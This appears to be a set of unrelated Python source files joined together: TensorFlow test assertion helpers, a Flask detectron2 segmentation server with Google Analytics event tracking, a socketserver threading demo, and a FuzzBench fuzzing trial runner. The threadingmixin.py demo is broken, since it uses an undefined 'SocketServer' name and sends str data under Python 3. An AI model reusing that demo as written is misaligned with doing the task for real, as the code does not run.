a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if
the number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
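# Illustrative usage sketch: matching either a regular expression or an
# arbitrary predicate against the raised OpError (the failing ops below are
# placeholders).
#
#   with self.assertRaisesOpError("negative input not supported"):
#     self.evaluate(some_op_that_should_fail)
#
#   with self.assertRaisesWithPredicateMatch(
#       errors.InvalidArgumentError, lambda e: "shape" in e.message):
#     self.evaluate(some_other_failing_op)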
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture
The figure in that guide illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
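# Illustrative usage sketch (the graph and node name are placeholders):
#
#   graph_def = some_graph.as_graph_def()
#   node = get_node_def_from_graph("MatMul_1", graph_def)
#   if node is not None:
#     print(node.op, node.input)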
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
|
server.py
|
from flask import Flask, jsonify, request, send_file
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from predictor import VisualizationDemo
import numpy as np
import cv2
import io
import requests
from queue import Empty, Queue
import threading
import time
import json
import subprocess
from apply_net import main as apply_net_main
requests_queue = Queue()
app = Flask(__name__)
BATCH_SIZE=1
CHECK_INTERVAL=0.1
def is_json(myjson):
try:
json.loads(myjson)
except (TypeError, ValueError):
return False
return True
def handle_requests_by_batch():
while True:
requests_batch = []
while not (
len(requests_batch) >= BATCH_SIZE # or
#(len(requests_batch) > 0 #and time.time() - requests_batch[0]['time'] > BATCH_TIMEOUT)
):
try:
requests_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
batch_outputs = []
for request in requests_batch:
batch_outputs.append(run(request['input'][0], request['input'][1]))
for request, output in zip(requests_batch, batch_outputs):
request['output'] = output
threading.Thread(target=handle_requests_by_batch).start()
def track_event(category, action, label=None, value=0):
data = {
'v': '1', # API Version.
'tid': 'UA-164242824-8', # Tracking ID / Property ID.
# Anonymous Client Identifier. Ideally, this should be a UUID that
# is associated with particular user, device, or browser instance.
'cid': '555',
't': 'event', # Event hit type.
'ec': category, # Event category.
'ea': action, # Event action.
'el': label, # Event label.
'ev': value, # Event value, must be an integer
'ua': 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14'
}
response = requests.post(
'https://www.google-analytics.com/collect', data=data)
# If the request fails, this will raise a RequestException. Depending
# on your application's needs, this may be a non-error and can be caught
# by the caller.
response.raise_for_status()
def setup_cfg(config_file, confidence_threshold = 0.5, is_gpu = False):
cfg = get_cfg()
cfg.merge_from_file(config_file)
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = confidence_threshold
cfg.MODEL.DEVICE = 'cpu' if is_gpu == False else 'cuda'
print(cfg.MODEL.DEVICE)
cfg.freeze()
return cfg
def run(input_file_in_memory, method):
if input_file_in_memory.shape[2] == 4 :
input_file_in_memory = input_file_in_memory[:,:,0:-1]
if method == 'instancesegmentation' or method == 'predictions' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml'
elif method == 'panopticsegmentation' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/panoptic_fpn_R_50_inference_acc_test.yaml'
elif method == 'keypoint' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/keypoint_rcnn_R_50_FPN_inference_acc_test.yaml'
elif method == 'densepose' :
io_buf = None
io_buf = io.BytesIO(apply_net_main(input_file_in_memory))
return io_buf
else :
return {'message': 'invalid parameter'}
cfg = setup_cfg(config_file=config_file, is_gpu=False)
debug = False if method == 'predictions' else True
demo = VisualizationDemo(cfg, debug=debug)
predictions, visualized_output, obj = demo.run_on_image(input_file_in_memory, debug)
if debug :
np_img = visualized_output.get_image()
output_file_in_memory = cv2.cvtColor(np_img, cv2.COLOR_BGR2RGB)
is_success, buffer = cv2.imencode(".jpg", output_file_in_memory)
io_buf = io.BytesIO(buffer)
return io_buf
else :
return obj
@app.route('/health')
def health():
return "ok"
@app.route('/<method>', methods=['POST'])
def run_python(method):
track_event(category='api_cpu', action=f'/{method}')
print(requests_queue.qsize())
if requests_queue.qsize() >= 1:
return 'Too Many Requests', 429
filestr = request.files['file'].read()
preview_mode = request.form.get('preview')
preview_mode = preview_mode == 'true'
npimg = np.frombuffer(filestr, np.uint8)
input_file_in_memory = cv2.imdecode(npimg, cv2.IMREAD_UNCHANGED)
if input_file_in_memory is None :
return jsonify({'message': 'invalid file'}), 400
print(input_file_in_memory.shape)
height, width, _ = input_file_in_memory.shape
if height * width >= 6250000 :
return jsonify({'message': 'too big size image'})
req = {
'input': [input_file_in_memory, method]
}
requests_queue.put(req)
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
ret = req['output']
if type(ret) is dict:
if preview_mode:
dump = json.dumps(ret)
if len(dump) > 1000 :
return jsonify(dump[0:1000]), 200
return jsonify(ret), 200
if is_json(ret) :
return jsonify(ret), 400
else :
return send_file(ret, mimetype='image/jpeg'), 200
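# Illustrative client call (the host, port and file name are made up):
#
#   import requests
#   with open('photo.jpg', 'rb') as f:
#       r = requests.post('http://localhost:80/instancesegmentation',
#                         files={'file': f}, data={'preview': 'false'})
#   # r.content is a JPEG for visualization methods and JSON for 'predictions'.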
if __name__ == "__main__":
app.run(debug=False, port=80, host='0.0.0.0')
|
threadingmixin.py
|
#!/usr/bin/env python3
import socket
import threading
import socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024).decode("utf-8")
cur_thread = threading.current_thread()
response = "{}: {}".format(cur_thread.name, data)
self.request.sendall(response.encode("utf-8"))
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(1024)
print("Received: {}".format(response))
finally:
sock.close()
if __name__ == "__main__":
# Port 0 means to select an arbitrary unused port
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print("Server loop running in thread:", server_thread.name)
client(ip, port, "Hello World 1")
client(ip, port, "Hello World 2")
client(ip, port, "Hello World 3")
server.shutdown()
server.server_close()
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs fuzzer for trial."""
from collections import namedtuple
import os
import posixpath
import shlex
import shutil
import subprocess
import sys
import tarfile
import threading
import time
import zipfile
from common import environment
from common import experiment_utils
from common import filesystem
from common import fuzzer_utils
from common import gsutil
from common import logs
from common import new_process
from common import retry
from common import utils
NUM_RETRIES = 3
RETRY_DELAY = 3
FUZZ_TARGET_DIR = '/out'
# This is an optimization to sync corpora only when it is needed. These files
# are temporary files generated during fuzzer runtime and are not related to
# the actual corpora.
EXCLUDE_PATHS = set([
# AFL excludes.
'.cur_input',
'.state',
'fuzz_bitmap',
'fuzzer_stats',
'plot_data',
# QSYM excludes.
'bitmap',
])
CORPUS_ELEMENT_BYTES_LIMIT = 1 * 1024 * 1024
SEED_CORPUS_ARCHIVE_SUFFIX = '_seed_corpus.zip'
File = namedtuple('File', ['path', 'modified_time', 'change_time'])
def _clean_seed_corpus(seed_corpus_dir):
"""Moves seed corpus files from sub-directories into the corpus directory
root. Also, deletes any files that exceed the 1 MB limit."""
if not os.path.exists(seed_corpus_dir):
return
failed_to_move_files = []
for root, _, files in os.walk(seed_corpus_dir):
for filename in files:
file_path = os.path.join(root, filename)
if os.path.getsize(file_path) > CORPUS_ELEMENT_BYTES_LIMIT:
os.remove(file_path)
logs.warning('Removed seed file %s as it exceeds 1 Mb limit.',
file_path)
continue
sha1sum = utils.file_hash(file_path)
new_file_path = os.path.join(seed_corpus_dir, sha1sum)
try:
shutil.move(file_path, new_file_path)
except OSError:
failed_to_move_files.append((file_path, new_file_path))
if failed_to_move_files:
logs.error('Failed to move seed corpus files: %s', failed_to_move_files)
def _get_fuzzer_environment():
"""Returns environment to run the fuzzer in (outside virtualenv)."""
env = os.environ.copy()
path = env.get('PATH')
if not path:
return env
path_parts = path.split(':')
# |VIRTUALENV_DIR| is the virtualenv environment that runner.py is running
# in. Fuzzer dependencies are installed in the system python environment,
# so need to remove it from |PATH|.
virtualenv_dir = env.get('VIRTUALENV_DIR')
if not virtualenv_dir:
return env
path_parts_without_virtualenv = [
p for p in path_parts if not p.startswith(virtualenv_dir)
]
env['PATH'] = ':'.join(path_parts_without_virtualenv)
return env
def get_clusterfuzz_seed_corpus_path(fuzz_target_path):
"""Returns the path of the clusterfuzz seed corpus archive if one exists.
Otherwise returns None."""
fuzz_target_without_extension = os.path.splitext(fuzz_target_path)[0]
seed_corpus_path = (fuzz_target_without_extension +
SEED_CORPUS_ARCHIVE_SUFFIX)
return seed_corpus_path if os.path.exists(seed_corpus_path) else None
def _unpack_clusterfuzz_seed_corpus(fuzz_target_path, corpus_directory):
"""If a clusterfuzz seed corpus archive is available, unpack it into the
corpus directory if it exists. Copied from unpack_seed_corpus in
engine_common.py in ClusterFuzz.
"""
seed_corpus_archive_path = get_clusterfuzz_seed_corpus_path(
fuzz_target_path)
if not seed_corpus_archive_path:
return
with zipfile.ZipFile(seed_corpus_archive_path) as zip_file:
# Unpack seed corpus recursively into the root of the main corpus
# directory.
idx = 0
for seed_corpus_file in zip_file.infolist():
if seed_corpus_file.filename.endswith('/'):
# Ignore directories.
continue
# Allow callers to opt-out of unpacking large files.
if seed_corpus_file.file_size > CORPUS_ELEMENT_BYTES_LIMIT:
continue
output_filename = '%016d' % idx
output_file_path = os.path.join(corpus_directory, output_filename)
zip_file.extract(seed_corpus_file, output_file_path)
idx += 1
logs.info('Unarchived %d files from seed corpus %s.', idx,
seed_corpus_archive_path)
def run_fuzzer(max_total_time, log_filename):
"""Runs the fuzzer using its script. Logs stdout and stderr of the fuzzer
script to |log_filename| if provided."""
input_corpus = environment.get('SEED_CORPUS_DIR')
output_corpus = environment.get('OUTPUT_CORPUS_DIR')
fuzz_target_name = environment.get('FUZZ_TARGET')
target_binary = fuzzer_utils.get_fuzz_target_binary(FUZZ_TARGET_DIR,
fuzz_target_name)
if not target_binary:
logs.error('Fuzz target binary not found.')
return
_unpack_clusterfuzz_seed_corpus(target_binary, input_corpus)
_clean_seed_corpus(input_corpus)
if max_total_time is None:
logs.warning('max_total_time is None. Fuzzing indefinitely.')
runner_niceness = environment.get('RUNNER_NICENESS', 0)
try:
with open(log_filename, 'w') as log_file:
# Because the runner is launched at a higher priority,
# set it back to the default(0) for fuzzing processes.
new_process.execute([
'nice', '-n',
str(0 - runner_niceness), 'python3', '-u', '-c',
('import fuzzer; '
'fuzzer.fuzz('
"'{input_corpus}', '{output_corpus}', '{target_binary}')"
).format(input_corpus=shlex.quote(input_corpus),
output_corpus=shlex.quote(output_corpus),
target_binary=shlex.quote(target_binary))
],
timeout=max_total_time,
output_files=[log_file],
kill_children=True,
env=_get_fuzzer_environment())
except subprocess.CalledProcessError:
logs.error('Fuzz process returned nonzero.')
class TrialRunner: # pylint: disable=too-many-instance-attributes
"""Class for running a trial."""
def __init__(self):
benchmark_fuzzer_directory = '%s-%s' % (environment.get(
'BENCHMARK'), environment.get('FUZZER_VARIANT_NAME'))
if not environment.get('LOCAL_EXPERIMENT'):
bucket = environment.get('CLOUD_EXPERIMENT_BUCKET')
experiment_name = environment.get('EXPERIMENT')
trial = 'trial-%d' % environment.get('TRIAL_ID')
self.gcs_sync_dir = posixpath.join(bucket, experiment_name,
'experiment-folders',
benchmark_fuzzer_directory,
trial)
# Clean the directory before we use it.
gsutil.rm(self.gcs_sync_dir, force=True)
else:
self.gcs_sync_dir = None
self.cycle = 1
self.corpus_dir = 'corpus'
self.corpus_archives_dir = 'corpus-archives'
self.results_dir = 'results'
self.unchanged_cycles_path = os.path.join(self.results_dir,
'unchanged-cycles')
self.last_sync_time = None
self.corpus_dir_contents = set()
def initialize_directories(self):
"""Initialize directories needed for the trial."""
directories = [
self.corpus_dir,
self.corpus_archives_dir,
self.results_dir,
]
for directory in directories:
filesystem.recreate_directory(directory)
def conduct_trial(self):
"""Conduct the benchmarking trial."""
self.initialize_directories()
log_file = os.path.join(self.results_dir, 'fuzzer-log.txt')
logs.info('Starting trial.')
max_total_time = environment.get('MAX_TOTAL_TIME')
args = (max_total_time, log_file)
thread = threading.Thread(target=run_fuzzer, args=args)
thread.start()
while thread.is_alive():
self.sleep_until_next_sync()
self.do_sync()
self.cycle += 1
logs.info('Doing final sync.')
self.do_sync(final_sync=True)
thread.join()
def sleep_until_next_sync(self):
"""Sleep until it is time to do the next sync."""
if self.last_sync_time is not None:
next_sync_time = (self.last_sync_time +
experiment_utils.SNAPSHOT_PERIOD)
sleep_time = next_sync_time - time.time()
if sleep_time < 0:
# Log error if a sync has taken longer than SNAPSHOT_PERIOD and
# messed up our time synchronization.
logs.warning('Sleep time on cycle %d is %d', self.cycle,
sleep_time)
sleep_time = 0
else:
sleep_time = experiment_utils.SNAPSHOT_PERIOD
logs.debug('Sleeping for %d seconds.', sleep_time)
time.sleep(sleep_time)
# last_sync_time is recorded before the sync so that each sync happens
# roughly SNAPSHOT_PERIOD after each other.
self.last_sync_time = time.time()
def _set_corpus_dir_contents(self):
"""Set |self.corpus_dir_contents| to the current contents of
|self.corpus_dir|. Don't include files or directories excluded by
|EXCLUDE_PATHS|."""
self.corpus_dir_contents = set()
corpus_dir = os.path.abspath(self.corpus_dir)
for root, _, files in os.walk(corpus_dir):
# Check if root is excluded.
relpath = os.path.relpath(root, corpus_dir)
if _is_path_excluded(relpath):
continue
for filename in files:
# Check if filename is excluded first.
if _is_path_excluded(filename):
continue
file_path = os.path.join(root, filename)
stat_info = os.stat(file_path)
last_modified_time = stat_info.st_mtime
# Warning: ctime means creation time on Win and may not work as
# expected.
last_changed_time = stat_info.st_ctime
file_tuple = File(file_path, last_modified_time,
last_changed_time)
self.corpus_dir_contents.add(file_tuple)
def is_corpus_dir_same(self):
"""Sets |self.corpus_dir_contents| to the current contents and returns
True if it is the same as the previous contents."""
logs.debug('Checking if corpus dir is the same.')
prev_contents = self.corpus_dir_contents.copy()
self._set_corpus_dir_contents()
return prev_contents == self.corpus_dir_contents
def do_sync(self, final_sync=False):
"""Save corpus archives and results to GCS."""
try:
if not final_sync and self.is_corpus_dir_same():
logs.debug('Cycle: %d unchanged.', self.cycle)
filesystem.append(self.unchanged_cycles_path, str(self.cycle))
else:
logs.debug('Cycle: %d changed.', self.cycle)
self.archive_and_save_corpus()
self.save_results()
logs.debug('Finished sync.')
except Exception: # pylint: disable=broad-except
logs.error('Failed to sync cycle: %d.', self.cycle)
def archive_corpus(self):
"""Archive this cycle's corpus."""
archive = os.path.join(
self.corpus_archives_dir,
experiment_utils.get_corpus_archive_name(self.cycle))
directories = [self.corpus_dir]
if self.cycle == 1:
# Some fuzzers like eclipser and LibFuzzer don't actually copy the
# seed/input corpus to the output corpus (which AFL does do), this
# results in their coverage being undercounted.
seed_corpus = environment.get('SEED_CORPUS_DIR')
directories.append(seed_corpus)
archive_directories(directories, archive)
return archive
def save_corpus_archive(self, archive):
"""Save corpus |archive| to GCS and delete when done."""
if not self.gcs_sync_dir:
return
basename = os.path.basename(archive)
gcs_path = posixpath.join(self.gcs_sync_dir, self.corpus_dir, basename)
# Don't use parallel to avoid stability issues.
gsutil.cp(archive, gcs_path, parallel=False)
# Delete corpus archive so disk doesn't fill up.
os.remove(archive)
@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.archive_and_save_corpus')
def archive_and_save_corpus(self):
"""Archive and save the current corpus to GCS."""
archive = self.archive_corpus()
self.save_corpus_archive(archive)
